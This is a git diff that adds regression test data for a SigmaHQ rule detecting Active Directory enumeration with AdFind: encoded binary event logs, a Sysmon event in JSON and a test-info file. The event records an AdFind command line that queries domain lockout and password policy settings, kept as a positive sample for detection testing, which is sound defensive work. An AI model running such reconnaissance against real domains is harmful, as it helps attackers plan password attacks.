b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx new file mode 100644 index 0000000000000000000000000000000000000000..b5128f2c68a8022d5719aa3d22b3588ebe164362 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json new file mode 100644 index 000000000..64e79fdd7 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T09:37:40.974119Z" + } + }, + "EventRecordID": 650014, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 09:37:40.972", + "ProcessGuid": "14207D89-F764-68F9-2410-000000003F02", + "ProcessId": 4316, + "Image": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\AdFind.exe", + "FileVersion": "1.62.0.6172", + "Description": "-", + "Product": "AdFind", + "Company": "www.joeware.net", + "OriginalFileName": "AdFind.exe", + "CommandLine": "AdFind.exe -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties", + "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201", + "ParentProcessGuid": "14207D89-F57C-68F9-D70F-000000003F02", + "ParentProcessId": 6488, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml new file mode 100644 index 000000000..94621d03a --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml @@ -0,0 +1,13 @@ +id: de5c7702-3eb3-41be-ae33-b36a6f13d985 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b + title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx new file mode 100644 index 0000000000000000000000000000000000000000..474247e0177ddc2793fe3b0b90d2c659efc800f2 GIT binary patch literal 69632 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 